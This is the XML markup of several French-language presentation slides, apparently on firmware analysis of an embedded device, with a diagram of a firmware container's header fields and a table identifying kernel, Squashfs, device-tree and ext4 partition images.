              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD415AC-5961-4479-2C31-F62AB85CFDBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110800" y="2639038"/>
            <a:ext cx="2376264" cy="242538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5">
            <a:fgClr>
              <a:schemeClr val="tx1"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:patt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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D945BA7-D369-EB07-B78A-88F1D41B1D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110800" y="3461282"/>
            <a:ext cx="2376264" cy="242538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5">
            <a:fgClr>
              <a:schemeClr val="tx1"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:patt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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Connecteur droit avec flèche 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74E18A99-A39D-DFDD-6C09-9AA0131D0304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3631084" y="1231036"/>
            <a:ext cx="0" cy="16505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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F821786-7CA4-40E8-074E-1A0DBE1AFC50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3629968" y="2881576"/>
            <a:ext cx="1116" cy="579706"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFBBD0B-577D-D977-19B8-9A8D562C1ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110800" y="3703657"/>
            <a:ext cx="2376264" cy="572661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="ZoneTexte 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF972E24-FCB6-1D8C-ABD3-95E38F5D9445}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2696910"/>
            <a:ext cx="1878830" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Nom de partition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="ZoneTexte 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEE269B3-10DC-8218-41ED-27AE860DF444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3192329"/>
            <a:ext cx="4390862" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Offset par rapport au début du fichier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="ZoneTexte 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8462CF-91E2-7502-F95D-FA88238AF51F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3687748"/>
            <a:ext cx="4390862" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Taille du bloc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="ZoneTexte 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85BF1556-119E-2638-EBBF-BA0D7CD201E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4237318"/>
            <a:ext cx="4390862" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Type de compression</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{962E1D19-B424-2F72-540C-B7A8ED362462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4288956" y="2715522"/>
            <a:ext cx="274787" cy="301291"/>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75CF8BAE-2200-3827-1146-BA58A16D0FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4288958" y="3226349"/>
            <a:ext cx="274791" cy="3012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F42C0296-850B-5D0E-FA57-95B8FE566061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4288956" y="4276318"/>
            <a:ext cx="274791" cy="3012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D35E76CB-32B4-31E0-01A7-6B50450CDDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4288957" y="3721768"/>
            <a:ext cx="274791" cy="3012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9DD6024-F4B3-FD78-10C5-F96368FFC63A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343981" y="1410348"/>
            <a:ext cx="890131" cy="190769"/>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44" name="Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82D3363B-49C0-171E-EE73-E482EA6DBAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7173731" y="1729931"/>
            <a:ext cx="941569" cy="1907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45" name="Rectangle 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8AEC48-BAE3-3C39-EA51-17562AE3426A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8137899" y="1728431"/>
            <a:ext cx="824963" cy="190769"/>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46" name="Rectangle 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C18E1020-6716-4684-50EE-4CD29D6FC6D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159519" y="1915182"/>
            <a:ext cx="514082" cy="190769"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38601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6" grpId="0" animBg="1"/>
      <p:bldP spid="37" grpId="0" animBg="1"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="45"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767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Espace réservé du texte 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Espace réservé du texte 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyse du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E613794-E460-2ECE-478C-F1FA11AB9893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461967" y="1242269"/>
            <a:ext cx="8220066" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvservice.img</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvservice.img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1.0 ext4 filesystem data, UUID=2b73d558-2369-4454-b167-15cc368fa9b4, volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvservice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>extents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) (large files)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Tableau 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFCA5149-DFC0-7B26-4E6A-46413086DC45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2897731629"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="602458" y="1943100"/>
          <a:ext cx="7939083" cy="2802936"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1477021">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4180381315"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6462062">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2645392949"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="350367">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Fichiers</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Commentaire</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2538112277"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="350367">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>KL.img</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>u-boot </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>legacy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>uImage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>, Linux-4.9.44+, Linux/ARM, OS Kernel Image (Not </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>compressed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1130799300"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="350367">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>RFS.img</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>Squashfs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> filesystem, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>little</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>endian</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>, version 4.0, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>zlib</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>compressed</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4032679269"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="350367">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>dtb.img</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Device Tree Blob version 17</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3548876811"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="350367">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>tvservice.img</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Linux </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>rev</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> 1.0 ext4 filesystem data</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1215016954"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="350367">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>usrfs.img</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Linux </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>rev</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> 1.0 ext4 filesystem data</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="121325405"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="350367">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>optfs.img</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Linux </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1"/>
                        <a:t>rev</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t> 1.0 ext4 filesystem data</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
